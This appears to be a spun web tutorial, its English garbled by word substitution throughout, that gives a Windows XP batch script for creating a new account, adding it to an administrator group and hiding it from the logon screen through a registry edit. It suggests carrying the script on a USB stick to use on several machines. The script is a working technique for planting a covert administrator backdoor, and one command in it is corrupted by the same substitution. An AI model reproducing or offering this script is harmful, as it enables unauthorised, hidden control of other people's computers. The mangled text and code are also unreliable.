There are a few simple requirements to be able to do this process.
They are as follows:
1. You charge to be already logged on an annual of the machine.
2. They charge to be active Windows XP.
3. They charge .bat files enabled on the machine. (Batch files)
Now already we accept met these requirements we are activity to go through accomplish appear creating your new Administrator account.
Step 1.
We charge to actualize .bat file.
By accomplishing this we charge to accessible up Notepad. For those that don't apperceive breadth Notepad is, accessible up start, go to all programs, go to accessories and it should be in there.
Once you accept opened Notepad you will charge to archetype this cipher into it.
Code:
@ECHO off
TITLE Admin annual creator
COLOR 0f
set AC_PART=001
:HEADER
echo.
ECHO [INFO]
ECHO [-] Actualize a hidden user annual (U:%AC_NAME%; P:%AC_PASS%; G:%AC_GROUP%; H:%AC_HIDE% )
echo \\
GOTO %AC_PART%
:001
SET /P AC_NAME=[*] Annual name? :
cls
SET AC_PART=002
GOTO HEADER
:002
SET /P AC_PASS=[*] Annual password? :
cls
SET AC_PART=003
GOTO HEADER
:003
SET /P AC_COMMENT=[*] Annual Comment? :
cls
SET AC_PART=004
GOTO HEADER
:004
ECHO [* The afterward groups are accessible on the machine.
ECHO.
net localgroup | acquisition "*"
ECHO.
SET /P AC_GROUP=[*] Group? :
cls
SET AC_PART=005
GOTO HEADER
:005
SET /P AC_OK=[*] Creating annual now, Continue? (y/n) :
IF NOT %AC_OK%==y GOTO 0051
net user %AC_NAME% %AC_PASS% /add /COMMENT:"%AC_COMMENT%"
net localgroup "%AC_GROUP%" %AC_NAME% /add
ECHO.
pause
:0051
cls
SET AC_PART=006
GOTO HEADER
:006
SET /P AC_HIDE=[*] Do you appetite to adumbrate the annual from the XP logon screen? (y/n) :
IF NOT %AC_HIDE%==y GOTO END
echo Windows Registry Editor Version 5.00>%TEMP%\\addregistry.reg
echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList]>>%TEMP%\\addregistry.reg
echo "%AC_NAME%"=dword:00000000>>%TEMP%\\addregistry.reg
Regedit /s %TEMP%\\addregistry.reg
Del %TEMP%\\addregistry.reg
:END
ECHO.
pause
Now already we accept affected this cipher into Notepad we charge to save the file. Go to Book and Save As. Save the book as YOURCHOICE.bat, replacing YOURCHOICE with whatever you appetite to name it as. As continued as the book ends in .bat you will be fine. Make abiding you save the book in an breadth area you can admission it.
Saving to a USB pen will beggarly that you can backpack this out on assorted computers which accommodated the requirements.
Step 2.
You will now charge to barrage the book you accept created and actualize a new Administrator account.
Double bang the book you created in adjustment to barrage it.
When prompted to do so add a Username, Password, Comment, Group and whether or not you appetite to adumbrate the account. (Enabling this advantage will adumbrate your annual from the login page.)
You should now accept created an Administrator annual which you can log assimilate the computer with and accept abounding access.
0 comments